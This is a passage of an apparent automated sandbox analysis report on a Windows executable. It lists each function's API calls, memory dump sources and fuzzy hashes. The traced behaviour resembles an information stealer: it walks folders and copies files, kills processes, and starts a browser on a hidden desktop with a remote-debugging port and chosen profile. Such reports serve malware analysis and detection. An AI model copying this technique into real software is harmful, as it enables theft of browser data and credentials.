                        • lstrcat.KERNEL32(?,?), ref: 0045CC5F
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045CC71
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045CC8B
                        • wsprintfA.USER32 ref: 0045CCB0
                        • PathMatchSpecA.SHLWAPI(?,01589198), ref: 0045CCE2
                        • CoInitialize.OLE32(00000000), ref: 0045CCEE
                          • Part of subcall function 0045CAE0: CoCreateInstance.COMBASE(0046B110,00000000,00000001,0046B100,?), ref: 0045CB06
                          • Part of subcall function 0045CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0045CB46
                          • Part of subcall function 0045CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0045CBC9
                        • CoUninitialize.COMBASE ref: 0045CD09
                        • lstrcat.KERNEL32(?,?), ref: 0045CD2E
                        • lstrlen.KERNEL32(?), ref: 0045CD3B
                        • StrCmpCA.SHLWAPI(?,0046CFEC), ref: 0045CD55
                        • wsprintfA.USER32 ref: 0045CD7D
                        • wsprintfA.USER32 ref: 0045CD9C
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0045CDB0
                        • wsprintfA.USER32 ref: 0045CDD8
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0045CDF1
                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0045CE10
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 0045CE28
                        • CloseHandle.KERNEL32(00000000), ref: 0045CE33
                        • CloseHandle.KERNEL32(00000000), ref: 0045CE3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045CE54
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045CE94
                        • FindNextFileA.KERNEL32(?,?), ref: 0045CF8D
                        • FindClose.KERNEL32(?), ref: 0045CF9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                        • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 3860919712-2388001722
                        • Opcode ID: a155c3f05a3ed1241360b494615d55d55462caaaa085aa6ead92f33f6f1c86b1
                        • Instruction ID: f136581e187de09c38b667175d5c5fb0cb93c8064acd202ddd73cb2078091f8b
                        • Opcode Fuzzy Hash: a155c3f05a3ed1241360b494615d55d55462caaaa085aa6ead92f33f6f1c86b1
                        • Instruction Fuzzy Hash: 72C18571A003089FDB24DF64DC89AEF777AAF44305F004559F909A7291EB78AE84CF64
                        Function 00449770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 00449790
                        • lstrcat.KERNEL32(?,?), ref: 004497A0
                        • lstrcat.KERNEL32(?,?), ref: 004497B1
                        • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004497C3
                        • memset.MSVCRT ref: 004497D7
                          • Part of subcall function 00463E70: lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00463EA5
                          • Part of subcall function 00463E70: lstrcpy.KERNEL32(00000000,0158A350), ref: 00463ECF
                          • Part of subcall function 00463E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0044134E,?,0000001A), ref: 00463ED9
                        • wsprintfA.USER32 ref: 00449806
                        • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00449827
                        • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00449844
                          • Part of subcall function 004646A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004646B9
                          • Part of subcall function 004646A0: Process32First.KERNEL32(00000000,00000128), ref: 004646C9
                          • Part of subcall function 004646A0: Process32Next.KERNEL32(00000000,00000128), ref: 004646DB
                          • Part of subcall function 004646A0: StrCmpCA.SHLWAPI(?,?), ref: 004646ED
                          • Part of subcall function 004646A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464702
                          • Part of subcall function 004646A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00464711
                          • Part of subcall function 004646A0: CloseHandle.KERNEL32(00000000), ref: 00464718
                          • Part of subcall function 004646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00464726
                          • Part of subcall function 004646A0: CloseHandle.KERNEL32(00000000), ref: 00464731
                        • memset.MSVCRT ref: 00449862
                        • lstrcat.KERNEL32(00000000,?), ref: 00449878
                        • lstrcat.KERNEL32(00000000,?), ref: 00449889
                        • lstrcat.KERNEL32(00000000,00474B60), ref: 0044989B
                        • memset.MSVCRT ref: 004498AF
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004498D4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00449903
                        • StrStrA.SHLWAPI(00000000,0158E010), ref: 00449919
                        • lstrcpyn.KERNEL32(006793D0,00000000,00000000), ref: 00449938
                        • lstrlen.KERNEL32(?), ref: 0044994B
                        • wsprintfA.USER32 ref: 0044995B
                        • lstrcpy.KERNEL32(?,00000000), ref: 00449971
                        • memset.MSVCRT ref: 00449986
                        • Sleep.KERNEL32(00001388), ref: 004499E7
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 004492E1
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 004492FA
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 00449399
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 004493E6
                          • Part of subcall function 00464740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00464759
                          • Part of subcall function 00464740: Process32First.KERNEL32(00000000,00000128), ref: 00464769
                          • Part of subcall function 00464740: Process32Next.KERNEL32(00000000,00000128), ref: 0046477B
                          • Part of subcall function 00464740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046479C
                          • Part of subcall function 00464740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004647AB
                          • Part of subcall function 00464740: CloseHandle.KERNEL32(00000000), ref: 004647B2
                          • Part of subcall function 00464740: Process32Next.KERNEL32(00000000,00000128), ref: 004647C0
                          • Part of subcall function 00464740: CloseHandle.KERNEL32(00000000), ref: 004647CB
                        • CloseDesktop.USER32(?), ref: 00449A1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                        • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                        • API String ID: 2040986984-1862457068
                        • Opcode ID: d50a263ce94cdc4d1c38c4bd2bd6e24ba91334cee86872c573b6aede8ffc14af
                        • Instruction ID: 33bb53f16b32265a42a80f907484395edcb10f9a60b0ba45deba1f6cd845eb3b
                        • Opcode Fuzzy Hash: d50a263ce94cdc4d1c38c4bd2bd6e24ba91334cee86872c573b6aede8ffc14af
                        • Instruction Fuzzy Hash: 5E918471A50208AFEB14DF74DC49FDE77B9AF44700F508099FA0DA7281DB74AE848BA4
                        Function 00451269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00451291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004512BF
                        • lstrlen.KERNEL32(00474CA8), ref: 004512CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512E7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 004512F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0045133A
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045135C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00451376
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004513AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004513D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004513E2
                        • lstrlen.KERNEL32(00471794), ref: 004513ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045140A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451416
                        • lstrlen.KERNEL32(?), ref: 00451423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451443
                        • lstrcat.KERNEL32(00000000,?), ref: 00451451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045147A
                        • StrCmpCA.SHLWAPI(?,0158D418), ref: 004514A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004514E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451535
                        • StrCmpCA.SHLWAPI(?,0158D810), ref: 00451552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451593
                        • lstrcpy.KERNEL32(00000000,?), ref: 004515BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004515E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004517BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004517F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045181C
                        • FindClose.KERNEL32(00000000), ref: 0045182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: 6f59a28d8806c4e56a392bde136ca54c4a2050f56d2a9cca469bc90457643814
                        • Instruction ID: fc699f0c0b8fcf24609fd9016985ea13122e7d107c8996b55a724bf2f8f1ea5a
                        • Opcode Fuzzy Hash: 6f59a28d8806c4e56a392bde136ca54c4a2050f56d2a9cca469bc90457643814
                        • Instruction Fuzzy Hash: 1FC1C470A102069BDB25EF75DD89BAF77B5AF04305F40112AFC4AA3362DB78DC458BA4
                        Function 0045E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0045E22C
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045E243
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045E263
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045E27D
                        • wsprintfA.USER32 ref: 0045E2A2
                        • StrCmpCA.SHLWAPI(?,0046CFEC), ref: 0045E2B4
                        • wsprintfA.USER32 ref: 0045E2D1
                          • Part of subcall function 0045EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0045EE12
                        • wsprintfA.USER32 ref: 0045E2F0
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0045E304
                        • lstrcat.KERNEL32(?,0158EAF8), ref: 0045E335
                        • lstrcat.KERNEL32(?,00471794), ref: 0045E347
                        • lstrcat.KERNEL32(?,?), ref: 0045E358
                        • lstrcat.KERNEL32(?,00471794), ref: 0045E36A
                        • lstrcat.KERNEL32(?,?), ref: 0045E37E
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0045E394
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E3D2
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E422
                        • DeleteFileA.KERNEL32(?), ref: 0045E45C
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045E49B
                        • FindClose.KERNEL32(00000000), ref: 0045E4AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                        • String ID: %s\%s$%s\*
                        • API String ID: 1375681507-2848263008
                        • Opcode ID: 3bc41afe60208ccf3695fee588f4617c0089e66223b6028e7d6d9084138d0a7b
                        • Instruction ID: cb58ec0e3c5e8d0175cb0d4e02884ccb7a294ab3d8b4d5a161ddc920c2d5d31a
                        • Opcode Fuzzy Hash: 3bc41afe60208ccf3695fee588f4617c0089e66223b6028e7d6d9084138d0a7b
                        • Instruction Fuzzy Hash: 768184719102189BDB24EF75DD49AEF77B9BF44300F40459AF90993251EB38AA88CFA4
                        Function 004416B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004416E2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044176C
                        • lstrcat.KERNEL32(00000000), ref: 00441776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004417A2
                        • lstrcpy.KERNEL32(00000000,?), ref: 004418F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004418FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat
                        • String ID: \*.*
                        • API String ID: 2276651480-1173974218
                        • Opcode ID: 5d16349fe3eb1badf03cc8e82b46e19dffc0818f7e2ef66a0a9cb1707989a027
                        • Instruction ID: c686e7154f042172a3be8a34f3715c5f671fbe4c640f845eea51a9d1634791a1
                        • Opcode Fuzzy Hash: 5d16349fe3eb1badf03cc8e82b46e19dffc0818f7e2ef66a0a9cb1707989a027
                        • Instruction Fuzzy Hash: 3A81A870A102069BEB21EF65DD85AAFB7F5AF04304F44112AF805A7361DB78DC81CBA9
                        Function 0045DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0045DD45
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0045DD4C
                        • wsprintfA.USER32 ref: 0045DD62
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045DD79
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045DD9C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045DDB6
                        • wsprintfA.USER32 ref: 0045DDD4
                        • DeleteFileA.KERNEL32(?), ref: 0045DE20
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0045DDED
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                          • Part of subcall function 0045D980: memset.MSVCRT ref: 0045D9A1
                          • Part of subcall function 0045D980: memset.MSVCRT ref: 0045D9B3
                          • Part of subcall function 0045D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045D9DB
                          • Part of subcall function 0045D980: lstrcpy.KERNEL32(00000000,?), ref: 0045DA0E
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,00000000), ref: 0045DA1C
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,0158E508), ref: 0045DA36
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,?), ref: 0045DA4A
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,0158D460), ref: 0045DA5E
                          • Part of subcall function 0045D980: lstrcpy.KERNEL32(00000000,?), ref: 0045DA8E
                          • Part of subcall function 0045D980: GetFileAttributesA.KERNEL32(00000000), ref: 0045DA95
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045DE2E
                        • FindClose.KERNEL32(00000000), ref: 0045DE3D
                        • lstrcat.KERNEL32(?,0158EAF8), ref: 0045DE66
                        • lstrcat.KERNEL32(?,0158D770), ref: 0045DE7A
                        • lstrlen.KERNEL32(?), ref: 0045DE84
                        • lstrlen.KERNEL32(?), ref: 0045DE92
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045DED2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                        • String ID: %s\%s$%s\*
                        • API String ID: 4184593125-2848263008
                        • Opcode ID: 4db847732f49da87cd59d31d58af156466ae1106088fce5ec006a3ca2222a8b0
                        • Instruction ID: 6429448106359c8cd427c7cf6e7660867a84156a8a4a62a644bab963b775a228
                        • Opcode Fuzzy Hash: 4db847732f49da87cd59d31d58af156466ae1106088fce5ec006a3ca2222a8b0
                        • Instruction Fuzzy Hash: D8618571910208AFCB24EF74DD49ADE77B9BF48305F4045A9F909A7251DB389E84CF64
                        Function 0045D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0045D54D
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045D564
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045D584
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045D59E
                        • lstrcat.KERNEL32(?,0158EAF8), ref: 0045D5E3
                        • lstrcat.KERNEL32(?,0158EAC8), ref: 0045D5F7
                        • lstrcat.KERNEL32(?,?), ref: 0045D60B
                        • lstrcat.KERNEL32(?,?), ref: 0045D61C
                        • lstrcat.KERNEL32(?,00471794), ref: 0045D62E
